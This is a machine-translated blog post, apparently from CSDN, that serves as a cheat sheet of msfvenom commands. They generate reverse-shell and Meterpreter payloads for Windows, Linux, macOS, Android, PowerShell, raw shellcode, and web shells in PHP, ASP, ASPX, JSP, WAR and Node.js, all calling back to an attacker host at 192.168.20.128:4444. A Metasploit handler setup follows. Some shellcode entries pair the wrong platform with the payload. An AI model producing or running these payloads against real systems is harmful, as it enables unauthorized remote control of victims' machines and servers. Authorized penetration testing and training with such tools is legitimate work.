当前位置:网站首页>MSF generate payload Encyclopedia
MSF generate payload Encyclopedia
2022-07-06 14:07:00 【Unknown white hat】
Catalog
resources
msf Generate payload Complete works of _ Unknown white hat blog -CSDN Blog
One 、payload
1.windwos
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Windows -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f exe > shell.exe
2.liunx
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Linux -f elf > shell.elf
3.mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform osx -f macho > shell.macho
4.android
msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 R > test.apk
5.Powershell
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1
6.shellcode(windwos)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Windows -f c
7.shellcode(liunx)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Linux -f c
8.shellcode(mac)
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform osx -f c
Two 、 rebound shell
1.python
msfvenom -p cmd/unix/reverse_python LHOST=192.168.20.128 LPORT=4444 -f raw > shell.py
msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.py
2.bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.20.128 LPORT=4444 -f raw > shell.sh
3.Perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.20.128 LPORT=4444 -f raw > shell.pl
4.Lua
msfvenom -p cmd/unix/reverse_lua LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.lua
5.Ruby
msfvenom -p ruby/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.rb
6.php
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
7.aspx
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f aspx -o shell.aspx
8.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f asp > shell.asp
9.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.jsp
10.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f war > shell.war
11.nodejs
msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.js
3、 ... and 、 monitor
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST 192.168.20.128
set LPORT 4444
show options # Leak filling
exploit
边栏推荐
- 实验七 常用类的使用
- canvas基础2 - arc - 画弧线
- 7-5 staircase upgrade (PTA program design)
- The United States has repeatedly revealed that the yield of interest rate hiked treasury bonds continued to rise
- 小程序web抓包-fiddler
- xray与burp联动 挖掘
- 搭建域环境(win)
- 深度强化文献阅读系列(一):Courier routing and assignment for food delivery service using reinforcement learning
- 实验五 类和对象
- QT meta object qmetaobject indexofslot and other functions to obtain class methods attention
猜你喜欢
About the parental delegation mechanism and the process of class loading
"Gold, silver and four" job hopping needs to be cautious. Can an article solve the interview?
攻防世界MISC练习区(SimpleRAR、base64stego、功夫再高也怕菜刀)
记一次api接口SQL注入实战
.Xmind文件如何上传金山文档共享在线编辑?
7-7 7003 组合锁(PTA程序设计)
HackMyvm靶机系列(5)-warez
Renforcer les dossiers de base de l'apprentissage
How to turn wechat applet into uniapp
UGUI—Text
随机推荐
TypeScript快速入门
Canvas foundation 2 - arc - draw arc
HackMyvm靶機系列(3)-visions
强化学习基础记录
Experiment 8 exception handling
[data processing of numpy and pytoch]
About the parental delegation mechanism and the process of class loading
HackMyvm靶机系列(1)-webmaster
How to understand the difference between technical thinking and business thinking in Bi?
扑克牌游戏程序——人机对抗
Using qcommonstyle to draw custom form parts
Interpretation of iterator related "itertools" module usage
HackMyvm靶机系列(4)-vulny
Strengthen basic learning records
msf生成payload大全
. How to upload XMIND files to Jinshan document sharing online editing?
Yugu p1012 spelling +p1019 word Solitaire (string)
A complete collection of papers on text recognition
Beautified table style
Experiment 7 use of common classes